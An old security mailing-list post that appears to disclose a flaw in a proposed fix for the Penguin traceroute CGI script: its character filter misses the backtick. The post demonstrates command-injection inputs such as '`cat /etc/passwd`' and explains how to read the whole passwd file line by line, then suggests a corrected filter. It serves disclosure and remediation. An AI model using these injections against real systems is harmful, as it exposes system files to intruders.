Hi,

As I was surfing through some older Securityfocus archives I stumbled
across the article about Penguin traceroute v1.0

http://online.securityfocus.com/archive/1/263285

This article described some metacharacter bugs in this CGI script, also it
included a suggested fix.

<quote>
Fix
   ===
   Open up the perl script in your favorite text editor, find a line that has
   "$host = $q->param('host');" Its usually the 13th line down then just add
   this line "$host =~ s/[;<>\*\|'&\$!?#\(\)\[\]\{\}:'"\\]//g;" under it and
   that should parse out any unwanted characters.
</quote>

Well, yes, it does parse out some metacharacters, but, the " ` " (backtick)
is not filtered out in any way. (probably one of the two quotes " ' " should be
a backtick). Also the slash and the hyphen are not filtered.

Example:
entering `cat /etc/passwd` gives us:

Taceroute to `cat /etc/passwd`
traceroute: unknown host root:*:0:0:Charlie

This is only the first line because only that one gets interpreted by traceroute.
But there are ways around this to retreive the full file with some patience:

Taceroute to `wc -l /etc/passwd`
traceroute to 18 (0.0.0.18), 64 hops max, 40 byte packets

So we see that in this case the passwd file is 18 lines big.
we could retreive the rest by doing tail -n 18 /etc/passwd , tail -n 17 etc.. etc..

The author and the the first person that found a bug in this script (Paul Jenkins)
have been notified.

Second fix: replace the second quote by a backtick and add slash and hyphen
to the filter :)

Cheers,
Marco van Berkum

--
|  Marco van Berkum / MB17300-RIPE     |
| m.v.berkumobit.nl / http://ws.obit.nl     |

• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]